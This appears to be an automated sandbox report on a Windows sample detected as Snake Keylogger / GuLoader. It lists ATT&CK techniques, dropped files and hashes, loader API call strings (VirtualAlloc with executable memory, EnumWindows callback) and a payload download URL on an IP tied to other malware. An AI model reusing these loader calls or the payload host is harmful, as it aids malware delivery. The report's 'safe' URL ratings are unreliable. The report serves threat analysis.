Source: ODjwCjQBAP.exe, 00000003.00000002.3305009935.00000000026A8000.00000004.00000020.00020000.00000000.sdmp, ODjwCjQBAP.exe, 00000003.00000002.3305009935.00000000026FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	API call chain: ExitProcess graph end node			graph_0-4891
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	API call chain: ExitProcess graph end node			graph_0-4898

Source: C:\Users\user\Desktop\ODjwCjQBAP.exe

Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_10001A5D

Source: C:\Users\user\Desktop\ODjwCjQBAP.exe

Process created: C:\Users\user\Desktop\ODjwCjQBAP.exe "C:\Users\user\Desktop\ODjwCjQBAP.exe"

Jump to behavior

Source: C:\Users\user\Desktop\ODjwCjQBAP.exe

Code function: 0_2_00405F19 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

0_2_00405F19

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	11 Masquerading	OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Clipboard Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	4 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	23 System Information Discovery	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ODjwCjQBAP.exe	53%	ReversingLabs	Win32.Spyware.Snakekeylogger

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
http://nsis.sf.net/NSIS_Error	0%	Avira URL Cloud	safe
http://84.38.129.16/uvsMrbCwSaj148.binS	0%	Avira URL Cloud	safe
http://84.38.129.16/uvsMrbCwSaj148.bin1	0%	Avira URL Cloud	safe
http://84.38.129.16/uvsMrbCwSaj148.bin%	0%	Avira URL Cloud	safe
http://84.38.129.16/uvsMrbCwSaj148.binSBx	0%	Avira URL Cloud	safe
http://84.38.129.16/uvsMrbCwSaj148.bin2BY	0%	Avira URL Cloud	safe
http://84.38.129.16/uvsMrbCwSaj148.bink	0%	Avira URL Cloud	safe
http://84.38.129.16/uvsMrbCwSaj148.binV	0%	Avira URL Cloud	safe
http://84.38.129.16/uvsMrbCwSaj148.bin)	0%	Avira URL Cloud	safe
http://84.38.129.16/uvsMrbCwSaj148.binm32	0%	Avira URL Cloud	safe
http://84.38.129.16/uvsMrbCwSaj148.binjB1	0%	Avira URL Cloud	safe
http://84.38.129.16/uvsMrbCwSaj148.bin	0%	Avira URL Cloud	safe
http://84.38.129.16/uvsMrbCwSaj148.binxM	0%	Avira URL Cloud	safe
http://84.38.129.16/uvsMrbCwSaj148.binMO	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://84.38.129.16/uvsMrbCwSaj148.bin	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nsis.sf.net/NSIS_Error	ODjwCjQBAP.exe	false	Avira URL Cloud: safe	unknown
http://84.38.129.16/uvsMrbCwSaj148.binV	ODjwCjQBAP.exe, 00000003.00000002.3305009935.00000000026A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://84.38.129.16/uvsMrbCwSaj148.bin1	ODjwCjQBAP.exe, 00000003.00000002.3305009935.00000000026A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://84.38.129.16/uvsMrbCwSaj148.binS	ODjwCjQBAP.exe, 00000003.00000002.3305009935.00000000026A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://84.38.129.16/uvsMrbCwSaj148.binSBx	ODjwCjQBAP.exe, 00000003.00000002.3305009935.00000000026FC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://84.38.129.16/uvsMrbCwSaj148.bin2BY	ODjwCjQBAP.exe, 00000003.00000002.3305009935.00000000026FC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://84.38.129.16/uvsMrbCwSaj148.bin)	ODjwCjQBAP.exe, 00000003.00000002.3305009935.00000000026A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://84.38.129.16/uvsMrbCwSaj148.bink	ODjwCjQBAP.exe, 00000003.00000002.3305009935.00000000026FC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://84.38.129.16/uvsMrbCwSaj148.binm32	ODjwCjQBAP.exe, 00000003.00000002.3305009935.00000000026E1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://84.38.129.16/uvsMrbCwSaj148.bin%	ODjwCjQBAP.exe, 00000003.00000002.3305009935.00000000026A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://84.38.129.16/uvsMrbCwSaj148.binMO	ODjwCjQBAP.exe, 00000003.00000002.3305009935.00000000026FC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	ODjwCjQBAP.exe	false		high
http://84.38.129.16/uvsMrbCwSaj148.binxM	ODjwCjQBAP.exe, 00000003.00000002.3305009935.00000000026FC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://84.38.129.16/uvsMrbCwSaj148.binjB1	ODjwCjQBAP.exe, 00000003.00000002.3305009935.00000000026FC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
84.38.129.16	unknown	Latvia		203557	DATACLUB-NL	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1569269
Start date and time:	2024-12-05 17:07:30 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ODjwCjQBAP.exe renamed because original name is a hash value
Original Sample Name:	c10aac838dd326d74fcc69eeae41117036ac26b858285fa0da034cba44762f7a.exe
Detection:	MAL
Classification:	mal68.troj.evad.winEXE@3/18@0/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 91% Number of executed functions: 66 Number of non-executed functions: 66
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target ODjwCjQBAP.exe, PID 6180 because there are no executed function
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: ODjwCjQBAP.exe

Simulations

Behavior and APIs

Time	Type	Description
11:09:18	API Interceptor	4x Sleep call for process: ODjwCjQBAP.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
84.38.129.16	Purchase Order.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	84.38.129.16/efxSlCP242.bin
84.38.129.16	Documenti di spedizione.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	84.38.129.16/rNWbaMk175.bin

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DATACLUB-NL	Shipping documents.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	84.38.133.48
	u9aPQQIwhj.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	84.38.133.42
	Shipping documents 000293994900.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	84.38.133.42
	QUOTE #46789_AL_JAMEELA24.exe	Get hash	malicious	Remcos, GuLoader	Browse	84.38.133.160
	Purchase Order.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	84.38.129.16
	Documenti di spedizione.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	84.38.129.16
	PO-94858.exe	Get hash	malicious	Snake Keylogger	Browse	185.29.11.116
	PO-94858.exe	Get hash	malicious	Snake Keylogger	Browse	185.29.11.116
	Order 10172024.bat.exe	Get hash	malicious	AgentTesla	Browse	185.29.11.116
	Order 10172024.bat.exe	Get hash	malicious	AgentTesla	Browse	185.29.11.116

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll	Anfrage.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Anfrage_244384.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Anfrage_244384.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Anfrage244384.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Anfrage244384.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Anfrage_244384.exe	Get hash	malicious	FormBook, GuLoader	Browse
	5112024976.exe	Get hash	malicious	FormBook, GuLoader	Browse
	5112024976.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Anfrage24438.zip	Get hash	malicious	FormBook, GuLoader	Browse
	Anfrage24438.exe	Get hash	malicious	FormBook, GuLoader	Browse

Created / dropped Files

C:\ProgramData\ankomstperrons.ini

Download File

Process:	C:\Users\user\Desktop\ODjwCjQBAP.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	3.9726590202682766
Encrypted:	false
SSDEEP:	3:guTWyXRAK4vn:TzRAKi
MD5:	276D6E1D94791E4BC828A3B5F04A73EA
SHA1:	4665FD1D7598D3D751B5232BBB0859123D79A3BE
SHA-256:	812A9FCAACC7A28EBA4FA5EDB16AE49DD9BBFECFC112E5957C984BC4A50F7304
SHA-512:	F8A6F577DE29F60997EAB5F032C6CAF6C2565C8E018EDDD88900DFF17062CCA7D2B6BA30844F8A7A0DB4759056481F6C1D290C99378E8C540031B3C3E008E8DE
Malicious:	false
Reputation:	low
Preview:	[Tnkerne]..Stikkelen=Skjorteknappernes66..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Brudgomme\saddleback.jer

Download File

Process:	C:\Users\user\Desktop\ODjwCjQBAP.exe
File Type:	Matlab v4 mat-file (little endian) , numeric, rows 20224, columns 0
Category:	dropped
Size (bytes):	241857
Entropy (8bit):	1.2492742831199217
Encrypted:	false
SSDEEP:	768:kn4C0nabowYKKucVjMHtvH3Eq1Zg5c+0o4u1uLlOxRuYP9aVsVL/e3ec6Axhe7rO:zAzhHNuZla85OxXCm
MD5:	FB3375E7CB0698DF507062161A26885F
SHA1:	5E98C5E6F50A1B57B1E72B412D9632603FF954EF
SHA-256:	EB781B87F06CBBB43E36413F70A97528DFF827A3DA9575E56142324F9CF43477
SHA-512:	949FB9F863EB2EC85B84C4DB3E4EA023F1C3FC09CB79FE52B58569C616FC28F2E0D095DB535C3B80EF44CE4F75EA4752313F4F20A3E3A61E49163FCE8078B79B
Malicious:	false
Reputation:	low
Preview:	.....O..............c...>........................q....................r...................W............................................................................................................up........................r.................".............................................~...........9...............+.....................................................................................W...............Y..............................................k.....J................... ................................................R..................................................................................5...............T.........................................O..........^........x...........W.......Q......................:......H............+.................................................................6.................................7............w..........s......$...........9..................................................................*........................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Forsvarsministrene\Overhates.txt

Download File

Process:	C:\Users\user\Desktop\ODjwCjQBAP.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	513
Entropy (8bit):	4.312755423928167
Encrypted:	false
SSDEEP:	12:iN2DyKkMNtYdKYK90GbzE1gcaAy6AGb0CY3EoAAV:iYDZBGILeGzAy6jbts
MD5:	3A44600B8B24F5CC7EF13B014C5FC8E6
SHA1:	DABC64C2788C61476C159BF60E27A0385B761223
SHA-256:	037EE7216549B3D566F3D53E5801D45ADACF332F937FB43BD5A5E3F0DF9662A6
SHA-512:	02985E9F575B10700A6C8FE167DB6EBD81E1B8DE758DFAB47BB01AB7FE568525C17E933AA2DB98673E1A43EB3EF63CAB6E97D59FE1B1D52E3484737E0D9B4CBE
Malicious:	false
Reputation:	low
Preview:	radiatoporose psychophonasthenia byjubilum,sirrees kyserne meathead dormitorier unarbitrative siddembelets kilopondene..locomutation josies sketchene tordentalerne budcykler beaumont naphthous frkkert..stenddes incorporable billowing dorsilateral bogkrybberne staler shantungfrakkes affy jaspilite..hanbury lastede smrrebrdsbutikkers keloids lydighedsngtelsers mesokurtic defectless banenettenes brkmidlernes preceded undfangedes querela afstandsmaalers..alexipharmical egenvgte acarids descends compresbyter buy,

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Forsvarsministrene\Protaspis.sol

Download File

Process:	C:\Users\user\Desktop\ODjwCjQBAP.exe
File Type:	data
Category:	dropped
Size (bytes):	305301
Entropy (8bit):	1.2617727746454932
Encrypted:	false
SSDEEP:	768:OFl7dydtg1PEAqjKsB0peIl0LVJmpGgJQZwWmkYvYTDjBlqndyzkEV5ndnGVa76E:hdKCZmTCLm4TyycJrcYKLdL59NBGa
MD5:	EADA66A6285325455F7E0780C000CB65
SHA1:	125A71ABF2ADCCFE6E4BB3D7BF80CAC064F71690
SHA-256:	D1E27B338C60688975AE1BB239D860E30490A7FEB5AEB1DF1DAD87244DD073AC
SHA-512:	669BA190147018B4CBA35D6CDE23D00683E73DE0C70B60C1AA03EDEC2C7CC629DA73A7495DB05CF4151E100C339C76AFD87A3D179FE98045ED38B02A7A478FB1
Malicious:	false
Reputation:	low
Preview:	.....................................?...........................~.............u....................................................................C....m...............................6....................................?...............^.......n...............................................................................................................[........................................................R..].......................L....h.............................................................s...................................................,.............=.............6........................3.... ...K.................................?.Z.............\...7..8. ....................................................&......................y........................................................................@...................g..................f................w.................................................?........................u.....W.Z. ..........................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Forsvarsministrene\barbecue.ste

Download File

Process:	C:\Users\user\Desktop\ODjwCjQBAP.exe
File Type:	data
Category:	dropped
Size (bytes):	302102
Entropy (8bit):	1.2507376038892632
Encrypted:	false
SSDEEP:	768:+0WlDZ0cyMp2n0GbzqUGvbn/eHiEmNAXxM4cCQHkR1WuFkHnvVG26UZRR15NykM4:b0/vvkPqdcKMyJAnrZpdZ
MD5:	43EB990B1BE1B4570969A310174D319F
SHA1:	BEAE29DB714C0576F1BA9256E64F1A0A015B3E84
SHA-256:	6884CDA80715F73C9D9AA9AD45B9BDE3D9965D2009270BA685B30DD21421C04D
SHA-512:	C0FBE88619A7BC3BB8F6CBC8B77B4C1E21A2AFB8A92B1DF4324C20980C5CF6362CB75B7D065391437147BA746A933EBBD51167E4DF2B94477298A87331E15C75
Malicious:	false
Preview:	.............................................u..................$....................................G........H.................................................u'..................................{..........&...............................N......................................H.........S..............................................................M.............v.........................J..................................................................................B......................................`........q......................G....%.L...............%.........b.........................>.................................f..<.................................<...l..............P......].....................................d.....H........{......................>...............3........................................j......................................@..............v.............................L..........S................f....2................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Forsvarsministrene\paradiset.cho

Download File

Process:	C:\Users\user\Desktop\ODjwCjQBAP.exe
File Type:	data
Category:	dropped
Size (bytes):	398964
Entropy (8bit):	1.2601730304396117
Encrypted:	false
SSDEEP:	1536:qIRuZM0E+SCsypSaDWDKQreAN/Ge8+QM8+cj4WHOlXtZ:pRuPs3DKYc5+QM1KW
MD5:	34495288F83EB902AC00567354E11253
SHA1:	F421E0A307361C05A9534639D2B3A446F4673BAF
SHA-256:	F917E97748DEE607ABCC405FA70D7614B2F96675914B64AE7FD6AC299BCF220B
SHA-512:	E2DE646C75526DDA1B22AEBFF7B7991DEC89D351012FA21D925046EF5DD78ABD2D999ACAAE7C8BA33747480D3C921CDAB05D98839AF3A552063070A3B4C48496
Malicious:	false
Preview:	.................i....................9........T............................................................g....................................................................6...................?..............].Z.....................................................}...6..............................<....................................................:..x.............;...............P..m...h.........................................................................................................................O..............d....P...................w..........u....3.....................................................:.......^......m.................................................................................................X.............3...................................m.................................................4...L..............................................................................................G.................................1.........."..5...........

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Forsyneenes.Oms

Download File

Process:	C:\Users\user\Desktop\ODjwCjQBAP.exe
File Type:	data
Category:	dropped
Size (bytes):	421931
Entropy (8bit):	7.01357660979347
Encrypted:	false
SSDEEP:	6144:GwXhFBgBHfn9LmvuRhFnvx1z4GvhBdI1/QKrulObwrH8rii28xe90oaQ6BYiFJ:O10GJ4tulOeYpBkaoa9PJ
MD5:	274FB510C29F8D4455002BE77288131E
SHA1:	B32B89FEA5CD3527E0EED372E8E39A86531C865B
SHA-256:	6ABCB47AEE8A2120422C246DE8C03B6A01A04B431BEC3E906A5BC1297B7D74BC
SHA-512:	347C665D7E99F536ED6E5CF1CFEF00AF8FD40EDA43042E09A28C1780517347AB066B17C7533FD1DCA279813277C97DFEC9C2116E51DB9F4E3E1C73B0C24DDD2D
Malicious:	false
Preview:	...........w......................W.BBBB......................>..................RR.eeee.B........99........O.O.bbb...........e...............................ddd...........AAA...H....4.....e......MM.u...........................III.........???.......:...........RRRR..................2....eee.0.......**....................44.....e......................................................__..........''..o....zzzz......l..w.........................5.........ccc.....................................3.....fff......5...........+.......'...........uu...../..==....((..............55.<.RRR........UU.999........L.............c..........................t...~~~................NNN......l.Y... ...........E..\...............II....\........QQ......gg.N......WWWWWWWWWW..........................m...'.................. ....+.....................`....~~...m....~~~.....YY...$$$..@.))).i.....................f.........D...........#............BB...>..^^.......................]]]........11...................xxx.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Freakouts.mis

Download File

Process:	C:\Users\user\Desktop\ODjwCjQBAP.exe
File Type:	data
Category:	dropped
Size (bytes):	438667
Entropy (8bit):	1.2554285943940462
Encrypted:	false
SSDEEP:	1536:WQqatwb3BquFonZ0MZGDfw/Ams7/cTCDEhqR9:prwTBq1ZPGD4/xsDEh8
MD5:	1EF716DEB3AD336E09ABC68798EEFB78
SHA1:	15E56DD29E83D44626E46F219AA1EFC8FEC6FB73
SHA-256:	6401066B34D5FD3C9103C01112200E109A78A3DC584B7E55392B7A45020A76B0
SHA-512:	6BD0842FE87E9C7467249673485392D1A718B84A757BE8AB94F4323F5BE358C0975A7E5BC4F74AF2EF69F5DB46AD00DCE3DDA9BBD20C2A6CE9D364883A40E7F9
Malicious:	false
Preview:	...........................a.............o.................L........................................s..)..........................................E................./.................@....................................................?........................d.................................................................~..............................................T...................=..............................9....../......................0....H..............x.....................................7..........................................................N............7..................................................R...............R...................z.................................................`......................G...............................................................................`.....................~.........................-.........................................................................................................n.....................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Kavalerens188.equ

Download File

Process:	C:\Users\user\Desktop\ODjwCjQBAP.exe
File Type:	data
Category:	dropped
Size (bytes):	419878
Entropy (8bit):	1.2587845148762749
Encrypted:	false
SSDEEP:	1536:iKHVhskoaFMrwPuNqw8hbEZ1EvgaKCiIklf3:JHcP9+w8hb8IQ
MD5:	93C85B7E4C86F442491FF2D5F5B3FE0B
SHA1:	893EE5DC579DA377DCE95F9DECAF57438F967112
SHA-256:	7D60978D18793A119BB47B0D702E2D1EFAE28514EB46E9F96D75BB6FDA4ECF99
SHA-512:	A0D6B52554F688E47986FFA6B3885393F47A5D51895DC40219BDB1C838609755B1A801E446B926B44AB6C2F4B8A05A183D3C6BBF0D16CA84802CB5DBCA1581C9
Malicious:	false
Preview:	.............................................................R2..I...............y.......................................!.............................B....................... .................................@.......................d.....d..................................`........,......................m.....L......j......3....H....;.........................................~......s......................................................K...........................................Q.........G.................................................a..............$...............................Y.......s................p...................................................................................................................................................................D...............................................&.......................B..............................2........i...........................................................`...............................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Komponnkr.Tok

Download File

Process:	C:\Users\user\Desktop\ODjwCjQBAP.exe
File Type:	data
Category:	dropped
Size (bytes):	125626
Entropy (8bit):	4.599921276453497
Encrypted:	false
SSDEEP:	1536:FdxtDxEepm0mgEeyIhPnO0BACj/73YG9OmZA/sI53ieUSF7c54uce:F4L0xhPnLyhrmZfIjUSAce
MD5:	B7832AD2AB09886CD2EF522834F98D9C
SHA1:	8065F02B75FB64B473F4D2639A7979E259CD2174
SHA-256:	5D03DDF30ABA8BBF73CDCA6306FB9A3147C4862C514C1EE8C7D1B680C782DD39
SHA-512:	257CCC8A6541EBAE7FA47B2BB3B7723EB90BED8B68CB3FB6BFC8528DAF1E736CCFAD8C8D6A98C6F580A2845BEA31E823E5011134D67FACFFA1C5B4FD087BBA7A
Malicious:	false
Preview:	.............I.kk.......x...........FFF.......:....""""...............TTT......HHH..<<.............................K.....I......s.........................a.....v.f..11............ll...>>>...NNN.........................KKK...]...........*....................2..ccc.sssss.rr.\..............rr...............V.u.CCC.......U......WW............._.../.rr.........,,.VV..............................................>>>.........BB............bb......II..PP........UUUUUUU..[[[.....//...........................\\.BBBB.<..........::.k....a..........&&&.....................,,...............?.O.....CCCC.........................T............................w.............+........888.zzzzzzzz...q.....+++............RR......ccc.......x........TT.......... .????..MM...........................___......1....c............cc...........jjjjj..WW......;...........W......A.{................{.............kk.......<<....,.[[[.....$$$...JJJ.....E.....6.....c..III.............III..uu...................m.```...z.

C:\Users\user\AppData\Local\Temp\nsm7F07.tmp

Download File

Process:	C:\Users\user\Desktop\ODjwCjQBAP.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.522964554947562
Encrypted:	false
SSDEEP:	3:sEMBQEJkJVEjyQRg8UxQoXUn:78ixvUn
MD5:	96583A1C65FA65B73DA55976CF33BD46
SHA1:	1419DD1AF5EEA789F27B794B8B00B58FBD4436EC
SHA-256:	47E7B2386AD56F9DD02D07945CD2CD17241F850D16BBF81F204A0ADCAA344619
SHA-512:	6328BE4F2F4E35B6CCE2C8F822EDFAAB3B63F61FC6F6845B7505D6C2E8F2F693EE2D19E8BF671BA64D9F72A34F9B834B2A301D2363F45E71267A9B7DE98A2AF3
Malicious:	false
Preview:	kernel32::VirtualAlloc(i 0,i 15593472, i 0x3000, i 0x40)p.r1

C:\Users\user\AppData\Local\Temp\nsm8A35.tmp

Download File

Process:	C:\Users\user\Desktop\ODjwCjQBAP.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	30
Entropy (8bit):	4.256564762130954
Encrypted:	false
SSDEEP:	3:DyWgLQIfLBJXmgU:mkIP25
MD5:	F15BFDEBB2DF02D02C8491BDE1B4E9BD
SHA1:	93BD46F57C3316C27CAD2605DDF81D6C0BDE9301
SHA-256:	C87F2FF45BB530577FB8856DF1760EDAF1060AE4EE2934B17FDD21B7D116F043
SHA-512:	1757ED4AE4D47D0C839511C18BE5D75796224D4A3049E2D8853650ACE2C5057C42040DE6450BF90DD4969862E9EBB420CD8A34F8DD9C970779ED2E5459E8F2F1
Malicious:	false
Preview:	user32::EnumWindows(i r1 ,i 0)

C:\Users\user\AppData\Local\Temp\nsp84D5.tmp

Download File

Process:	C:\Users\user\Desktop\ODjwCjQBAP.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	56
Entropy (8bit):	4.250903860294566
Encrypted:	false
SSDEEP:	3:sAAEVvjskqMj84n:fLd3t
MD5:	A251227F7BA8BD5EF8A5B99D81D44222
SHA1:	27CBF4978A9082A801672164A389B96119BE8271
SHA-256:	164EA3B0C3B4B7D9275271180CF650175DC675686D5557EF713831B124688F5F
SHA-512:	EBB510350495107D5BD8E696D2DFADCFA4B775811246EA11E29B882D63C055DAA8D352C057F0C8D5156A3848964EE62C6B39883B3150F0D4BA7EE27F2091A158
Malicious:	false
Preview:	kernel32::ReadFile(i r5, i r1, i 15593472,*i 0, i 0)i.r3

C:\Users\user\AppData\Local\Temp\nsr63EA.tmp

Download File

Process:	C:\Users\user\Desktop\ODjwCjQBAP.exe
File Type:	data
Category:	dropped
Size (bytes):	2682753
Entropy (8bit):	2.7848088611908874
Encrypted:	false
SSDEEP:	12288:/10GJ4tulOeYpBkaoa9PuCvwqeJ6gvBse+tJ:/10qM0UBkratxehBse+7
MD5:	2C8A73338F777DE95B016F5B6B0C5FDC
SHA1:	61D7202F7EA11E8F77A8F2196109389593F88F95
SHA-256:	4F705E202B3704AFE971846F09B9968CBECBBBD90C4E84C7D903F5C798166A1D
SHA-512:	74E42B5EE48AB51BE6E37C771A7712B9110F6BF50DE89AEFE422A61561087B270792A38CF02F6155F5A29655EB34D524C8C82242E2797437F121A2BA4EE796DC
Malicious:	false
Preview:	.@......,........................0.......?.......@..........................]...{...........................................................................................................................................................................................................J...N...............j...............................................................................................................................g...........................................................................L...#...'...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\ODjwCjQBAP.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	5.7711167426271945
Encrypted:	false
SSDEEP:	192:OPtkumJX7zB22kGwfy0mtVgkCPOsX1un:/702k5qpdsXQn
MD5:	3F176D1EE13B0D7D6BD92E1C7A0B9BAE
SHA1:	FE582246792774C2C9DD15639FFA0ACA90D6FD0B
SHA-256:	FA4AB1D6F79FD677433A31ADA7806373A789D34328DA46CCB0449BBF347BD73E
SHA-512:	0A69124819B7568D0DEA4E9E85CE8FE61C7BA697C934E3A95E2DCFB9F252B1D9DA7FAF8774B6E8EFD614885507ACC94987733EBA09A2F5E7098B774DFC8524B6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Anfrage.exe, Detection: malicious, Browse Filename: Anfrage_244384.exe, Detection: malicious, Browse Filename: Anfrage_244384.exe, Detection: malicious, Browse Filename: Anfrage244384.exe, Detection: malicious, Browse Filename: Anfrage244384.exe, Detection: malicious, Browse Filename: Anfrage_244384.exe, Detection: malicious, Browse Filename: 5112024976.exe, Detection: malicious, Browse Filename: 5112024976.exe, Detection: malicious, Browse Filename: Anfrage24438.zip, Detection: malicious, Browse Filename: Anfrage24438.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L.....MX...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..`....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsz6B5D.tmp

Download File

Process:	C:\Users\user\Desktop\ODjwCjQBAP.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	74
